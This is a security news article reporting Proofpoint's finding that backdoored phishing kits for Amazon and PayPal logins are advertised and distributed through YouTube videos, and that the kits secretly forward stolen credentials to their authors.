According to experts from the security firm Proofpoint, scammers are advertising on YouTube backdoored phishing templates offering also “how-to” videos and manuals.
It is not a novelty, cyber criminals are switching on legitimate websites to propose their products and services.
Proofpoint researchers have observed scammers distributing phishing templates and related kits via YouTube, a query for “paypal scama” returns over 114,000 results.
The kits offered for sale through YouTube include a backdoor that automatically sends the phished information back to the author.
“A simple search for “paypal scama” returns over 114,000 results. There’s a catch, though, for criminals downloading the software: a backdoor sends the phished information back to the author. While backdoors on these templates aren’t new, the use of YouTube to advertise and distribute them is a new trend.” reads a blog post published by Proofpoint.
The videos show the appearance of the templated and provide instruct to the potential buyers on how to steal information from the victims with phishing attacks.
The post shows as an example of these malicious kits, an Amazon phishing template that replicates the legitimate login page of the popular website.
The researchers downloaded one of the kits advertised on YouTube and analyzed it discovering that the clumsy scammer left his Gmail address hardcoded in the template alongside with an email address used to receive the stolen credentials from the template.
The researchers also analyzed a template for PayPal scammers that was improved to avoid suspicion.
“In this PayPal scam, the author attempts to avoid raising suspicions by adding a PHP include for a file called style.js just before the PHP “mail” command is used to ship off the stolen credentials.” reads the analysis.
The researchers noticed that many videos have been posted for months, a circumstance that suggests the lack of filtering mechanisms implemented by YouTube.
“Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software,” states Proofpoint.
(Security Affairs – phishing templates, cybercrime)
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.